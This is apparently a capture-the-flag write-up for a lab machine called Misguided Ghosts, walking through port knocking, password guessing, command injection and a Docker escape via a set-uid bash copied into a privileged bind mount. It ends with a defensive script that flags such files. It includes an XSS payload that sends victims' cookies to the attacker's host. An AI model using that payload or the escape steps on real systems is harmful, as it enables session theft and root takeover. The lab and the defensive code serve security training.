Misguided Ghosts
Difficulty: ⭐⭐ Topics covered: Docker privilege escalation, Docker escape, XSS, encryption and decryption
Port scan
root@ip-10-10-227-106:~/misguidedghosts# nmap -sTCV -p- --min-rate 1000 10.10.33.149
Starting Nmap 7.60 ( https://nmap.org ) at 2023-12-03 09:18 GMT
Nmap scan report for ip-10-10-30-71.eu-west-1.compute.internal (10.10.30.71)
Host is up (0.0058s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Aug 28 2020 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.227.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:91:89:96:af:bc:06:b9:8d:43:df:53:dc:1f:8f:12 (RSA)
| 256 25:0b:be:a2:f9:64:3e:f1:e3:15:e8:23:b8:8c:e5:16 (ECDSA)
|_ 256 09:59:9a:84:e6:6f:01:f3:33:8e:48:44:52:49:14:db (EdDSA)
MAC Address: 02:81:75:3F:CC:9B (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.80 seconds
The port scan shows that FTP allows anonymous login; logging in anonymously yields three files:
root@ip-10-10-227-106:~/misguidedghosts# ls
info.txt jokes.txt trace.pcapng
root@ip-10-10-227-106:~/misguidedghosts# cat info.txt
I have included all the network info you requested, along with some of my favourite jokes.
- Paramore
root@ip-10-10-227-106:~/misguidedghosts# cat jokes.txt
Taylor: Knock, knock.
Josh: Who's there?
Taylor: The interrupting cow.
Josh: The interrupting cow--
Taylor: Moo
Josh: Knock, knock.
Taylor: Who's there?
Josh: Adore.
Taylor: Adore who?
Josh: Adore is between you and I so please open up!
At this point it looks like a port-knocking challenge: we first need to work out the knocking sequence from the packet capture. Inspecting the capture gives the following order:
7864 8273 9241 12007 60753
Knocking and then running the port scan again shows a newly opened port:
root@ip-10-10-141-243:~/misguidedghosts/knock# ./knock 10.10.104.113 7864 8273 9241 12007 60753
root@ip-10-10-141-243:~/misguidedghosts/knock# nmap -sTCV -p- --min-rate 1000 10.10.104.113
Starting Nmap 7.60 ( https://nmap.org ) at 2023-12-03 11:12 GMT
Nmap scan report for ip-10-10-104-113.eu-west-1.compute.internal (10.10.104.113)
Host is up (0.00060s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Aug 28 2020 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.141.243
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:91:89:96:af:bc:06:b9:8d:43:df:53:dc:1f:8f:12 (RSA)
| 256 25:0b:be:a2:f9:64:3e:f1:e3:15:e8:23:b8:8c:e5:16 (ECDSA)
|_ 256 09:59:9a:84:e6:6f:01:f3:33:8e:48:44:52:49:14:db (EdDSA)
8080/tcp open ssl/http Werkzeug httpd 1.0.1 (Python 2.7.18)
|_http-title: Misguided Ghosts
| ssl-cert: Subject: commonName=misguided_ghosts.thm/organizationName=Misguided Ghosts/stateOrProvinceName=Williamson Country/countryName=TN
| Not valid before: 2020-08-11T16:52:11
|_Not valid after: 2021-08-11T16:52:11
MAC Address: 02:CB:67:48:1C:F3 (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.74 seconds
Browse to port 8080; note that HTTPS is required here.
root@ip-10-10-141-243:~/misguidedghosts# gobuster dir -u https://10.10.104.113:8080/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.104.113:8080/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,txt
[+] Timeout: 10s
===============================================================
2023/12/03 11:27:15 Starting gobuster
===============================================================
/login (Status: 200)
/dashboard (Status: 302)
/console (Status: 200)
Next we need to log in, but we have no account. So far the certificate is the one thing we do have; inspecting its contents reveals the issuer's email address, from which we guess the username zac. Trying the weak password zac then turns out to work.
After logging in, the hint on the page tells us it is time to phish with XSS. After a series of attempts I ended up with the following payload:
<Script>document.location="http://10.10.141.243:8000/?c="+document.cookie;</Script> # Once the cookie has been captured with this, the target machine needs to be reset; it is a bit destructive.
Logging in with the stolen cookie did not reveal anything at first, so I ran the directory scan again with the admin account's cookie and found one more page. After some probing it turned out to be a bit odd: it has a command injection vulnerability.
root@ip-10-10-141-243:~/misguidedghosts# gobuster dir -u https://10.10.61.76:8080/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,txt -c 'login=hayley_is_admin' -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.61.76:8080/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] Cookies: login=hayley_is_admin
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,txt
[+] Timeout: 10s
===============================================================
2023/12/03 12:52:14 Starting gobuster
===============================================================
/login (Status: 302)
/photos (Status: 200)
/dashboard (Status: 200)
/console (Status: 200)
Post-exploitation
root (172.17.0.2)
Inside the Docker container, two files were found under the zac user; reading them shows that one of them is a private key.
When I tried to log in with it, the key was rejected as malformed, so it must be encrypted or encoded and needs decoding first. This involves a fairly involved decoding process, which I will cover separately in a dedicated CyberChef write-up.
root (172.17.0.2) —> zac(10.10.61.76)
Once the SSH key is repaired we can log in directly.
zac(10.10.61.76) —> root(10.10.61.76)
The earlier Docker environment contained a start.sh; I guessed this was the container's start command, and reading it showed that the container mounts /home/zac/notes in privileged mode, which immediately suggested the approach: from inside the container, copy a bash binary into /home/zac/notes and set the set-uid bit on it as root, then run it from the host as zac.
zac@misguided_ghosts:~/notes$ ls -al bash
-rwsr-xr-x 1 root root 1113504 Dec 3 13:40 bash
zac@misguided_ghosts:~/notes$ ./bash -p
bash-4.4# id
uid=1001(zac) gid=1001(zac) euid=0(root) groups=1001(zac)
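Added example, not part of the writeup: a host-side check a defender could run against a directory that a privileged container bind-mounts, flagging root-owned set-uid files such as the bash copy above, plus a parser that reports which mounts lack the nosuid option. The mountinfo lines are constructed, and the demo uses a file owned by the current user because an unprivileged run cannot create root-owned files.

```python
import os
import stat
import tempfile

def find_suid(root_dir, owner_uid=0):
    """Walk root_dir without following symlinks and return, sorted, the regular
    files owned by owner_uid that carry the set-uid bit. Run on the host with
    owner_uid=0 against a bind-mounted directory, it flags a dropped root shell."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for fname in filenames:
            path = os.path.join(dirpath, fname)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry; keep scanning
            if (stat.S_ISREG(st.st_mode) and st.st_uid == owner_uid
                    and st.st_mode & stat.S_ISUID):
                hits.append(path)
    return sorted(hits)

def mounts_honouring_suid(mountinfo_text):
    """From /proc/self/mountinfo text, return the mount points whose options
    lack 'nosuid', i.e. where the kernel honours a set-uid bit at exec time."""
    result = []
    for line in mountinfo_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and "nosuid" not in fields[5].split(","):
            result.append(fields[4])  # fields[4] is the mount point
    return result

# Constructed mountinfo lines (not captured from the box): only the notes bind mount lacks nosuid.
SAMPLE_MOUNTINFO = """\
24 30 0:22 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
31 30 0:5 / /dev rw,nosuid,relatime - devtmpfs udev rw,size=1000k
45 30 8:1 /home/zac/notes /srv/notes rw,relatime - ext4 /dev/sda1 rw
"""

def demo():
    """Build a throwaway directory with one plain and one set-uid file (owned by
    the current user, as an unprivileged run cannot create root-owned files)
    and return the base names the scan flags."""
    base = tempfile.mkdtemp(prefix="suid-demo-")
    for name, mode in (("README", 0o644), ("bash", 0o4755)):  # 4755 = rwsr-xr-x
        path = os.path.join(base, name)
        open(path, "w").close()
        os.chmod(path, mode)
    return [os.path.basename(p) for p in find_suid(base, owner_uid=os.getuid())]
```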